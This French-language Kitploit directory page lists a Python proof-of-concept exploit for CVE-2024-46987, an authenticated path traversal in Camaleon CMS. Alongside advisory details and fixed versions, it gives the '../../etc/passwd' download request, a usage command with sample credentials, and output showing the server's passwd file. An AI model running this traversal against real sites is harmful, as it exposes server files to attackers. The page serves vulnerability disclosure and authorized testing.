Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/advaitpathak21/cve-2024-46987
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Exploit créé en Python

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-46987 – Camaleon CMS : traversée de chemin authentifiée / lecture arbitraire de fichiers

CVSS 7.7 High Python PoC

CVE-2024-46987 est une vulnérabilité de traversée de chemin authentifiée (CWE-22) dans Camaleon CMS (un système de gestion de contenu basé sur Ruby on Rails). Elle permet à un utilisateur connecté (même avec des privilèges limités) de lire des fichiers arbitraires sur le serveur via l'action MediaController#download_private_file.

  • Publié : 18 septembre 2024
  • CVSS v3.1 : 7.7 High
    Vecteur : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE : CWE-22 (Limitation incorrecte du chemin d'un fichier à un répertoire restreint), CWE-200 (Exposition d'informations sensibles)
  • Versions concernées : Camaleon CMS ≤ 2.8.0 (certains rapports indiquent qu'elle fonctionne aussi sur 2.9.0)
  • Corrigée dans : ≥ 2.8.2 (recommandé : mettre à jour vers la dernière version 2.8.x ou 2.9.x)
  • Avis de sécurité :
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
Télécharger l’outil
  • NVD CVE-2024-46987
  • GitHub Security Lab GHSL-2024-183
  • Aperçu de la vulnérabilité

    Un attaquant disposant d'identifiants valides peut envoyer une requête spécialement conçue à : /admin/media/download_private_file?file=../../../../etc/passwd

    Installation des dépendances

    • pip install -r requirements.txt

    OU

    • pip install -r requests fire

    Utilisation

    • Créez d'abord un nouvel utilisateur
    root@kitploit:~
    python cms-exploit.py \
      --url http://target.local \
      --username neal \
      --password 'Caffery@123' \
      --cmd /etc/passwd
    
    • Exemple de sortie :
    root@kitploit:~
    [+] Login successful
    [*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
    [+] Success – content:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    .
    .
    

    Remarque : Le script suppose un formulaire de connexion de type Rails (user[email], user[password], authenticity_token). Ajustez les champs de la charge utile si votre cible utilise des noms personnalisés.

    Avertissement légal et éthique

    Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

    Utilisez-le uniquement sur des systèmes qui vous appartiennent ou pour lesquels vous disposez d'une autorisation écrite explicite de test (par exemple, les programmes de bug bounty, les tests d'intrusion internes, les laboratoires comme HTB). Toute utilisation non autorisée peut enfreindre les lois. L'auteur n'est pas responsable d'un mauvais usage.